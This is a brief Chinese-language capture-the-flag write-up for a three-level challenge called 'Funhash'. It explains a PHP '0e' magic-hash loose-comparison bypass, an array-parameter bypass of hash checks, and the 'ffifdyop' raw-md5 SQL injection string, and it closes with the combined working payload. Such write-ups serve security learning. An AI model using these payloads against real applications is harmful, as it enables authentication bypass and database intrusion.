Funhash
有三个level,一个一个过
level1:
hash函数之后的值等于原值,也就是使用hash进行md4加密之后的密文=明文,比较常见的有0e碰撞相等
给出两个加密之后开头仍是0e的字符串:0e251288019、0e001233333333333334557778889
hash1=0e001233333333333334557778889绕过level1
level2
数组绕过:hash2[]=1&hash3[]=3
level3
特殊字符绕过:hash4=ffifdyop
最终payload:
hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=3&hash4=ffifdyop